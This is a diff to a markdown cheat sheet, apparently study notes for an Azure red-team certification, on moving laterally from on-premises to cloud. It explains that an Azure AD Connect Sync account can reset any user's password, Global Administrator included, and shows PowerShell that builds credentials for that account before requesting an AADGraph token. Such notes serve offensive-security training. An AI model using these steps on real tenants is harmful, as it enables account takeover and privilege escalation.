0xJs/CARTP-cheatsheet/Cloud-OnPrem-lateral-movement.md

 ### Reset password of any user
 - Using the Sync_* account we can reset password for any user.
 (Including Global Administrator and the user who created the tenant)

-#### Using the creds, request an access token for AADGraph and save it to cache
+#### Using the creds, request an access token for AADGraph and save it to cache using the SYNC account.
 ```
 $passwd = ConvertTo-SecureString '<password>' -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential ("Sync_DEFENG-ADCNCT_782bef6aa0a9@defcorpsecure.onmicrosoft.com", $passwd)